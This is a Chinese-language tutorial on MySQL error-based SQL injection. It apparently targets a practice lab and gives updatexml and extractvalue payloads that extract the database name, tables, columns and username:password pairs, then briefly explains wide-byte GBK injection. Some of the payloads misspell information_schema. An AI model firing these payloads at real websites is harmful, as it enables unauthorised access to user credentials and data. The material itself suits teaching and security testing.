SQL报错注入

SQL注入报错注入

报错注入原理:报错注入是通过特殊函数错误使用并使其输出错误结果来获取信息的在遇到有报错回显的时候,但是没有数据回显的情况下可以利用报错注入的函数:

1.floor():向下取整

2.extractvalue(): 对XML文档进行查询的函数,当参数的格式不正确而

产生的错误,会返回参数的信息

3.updatexml(): 更新xml文档的函数,原理跟extracvalue一样

4.exp0:以e为底的指数函数

5.rand()+group()+count()

updatexml()

函数语法: updatexml(XML_document,XPath_string,new_value);

适用版本:5.1.5+

payload: updatexml(1,concat(0x7e,(select user()),0x7e),1)

前后添加~使其不符合xpath格式从而报错

复制代码
0x7e是~

extractvalue()

函数语法: EXTRACTVALUE(XML_document,XPath_string);

适用版本:5.1.5+

利用原理与updatexml函数相同

payload: and(extractvalue(1,concat(0x7e,(select user()),0x7e))

流程

1.利用爆破数据库名

and extractvalue(1,concat(0x7e,database(),0x7e)) --+

2.利用爆表名

and extractvalue(1,concat(0x7e,(select group_concat(table_name) from infomation_schema.tables where table_schema=database()),0x7e)) --+

3.利用爆列名

and extractvalue(1,concat(0x7e,(select group_concat(column_name) from infomation_schema.columns where table_name='users'),0x7e)) --+

但是可以发现没有全部显示列出来玩吗可以利用and column_name not in('id','login','password','email','secret')来显示其他的值,如果还是没有就全部显示出来就继续加到and 里面的值

and extractvalue(1,concat(0x7e,(select group_concat(column_name) from infomation_schema.columns where table_name='users' and column_name not in('id','login','password','email','secret')),0x7e)) --+

4.利用爆破值

and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e)) --+

同样的没有显示全利用where username not in('Dumb','Angelina')

and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in('Dumb','Angelina')),0x7e)) --+

SQL注入之宽字节注入

1.宽字节注入

原因:

1.现在大多数的网站对于SQL注入都做了一定的方法,例如使用一些Mysql中转义的函数addslashes,mysql_realescape_string,mysql_escape_string等,还有一种是配置magic_quote gpc,不过PHP高版本已经移除此功能。其实这些函数就是为了过滤用户输入的一些数据,对

特殊的字符加上反斜杠"\"进行转义。

2.网站开启了magic_quote gpc,或者使用了上面的转义函数数据库设置成gbk编码(不是html编码)

3.在编码中,gbk编码占用2个字符,ascll占用1个字符,攻击者恶意构造,把ascll字符吃掉,就能进行下一步攻击

相关推荐
网硕互联的小客服39 分钟前
未来趋势:AI与量子计算对服务器安全的影响
运维·服务器·网络·网络安全·量子计算
GJCTYU43 分钟前
spring中@Transactional注解和事务的实战理解附代码
数据库·spring boot·后端·spring·oracle·mybatis
MicroTech20251 小时前
微算法科技(NASDAQ: MLGO)探索Grover量子搜索算法,利用量子叠加和干涉原理,实现在无序数据库中快速定位目标信息的效果。
数据库·科技·算法
Code季风1 小时前
SQL关键字快速入门:CASE 实现条件逻辑
javascript·数据库·sql
玥轩_5211 小时前
BUUCTF [WUSTCTF2020]spaceclub 1
安全·网络安全·ctf·buuctf·ascii·spaceclub·wustctf2020
weixin_478689761 小时前
操作系统【2】【内存管理】【虚拟内存】【参考小林code】
数据库·nosql
ManageEngine卓豪1 小时前
网络工具如何帮助消除网络安全风险
网络安全·网络管理·网络工具
九皇叔叔2 小时前
【7】PostgreSQL 事务
数据库·postgresql
kk在加油2 小时前
Mysql锁机制与优化实践以及MVCC底层原理剖析
数据库·sql·mysql
Kookoos2 小时前
ABP VNext + Cosmos DB Change Feed:搭建实时数据变更流服务
数据库·分布式·后端·abp vnext·azure cosmos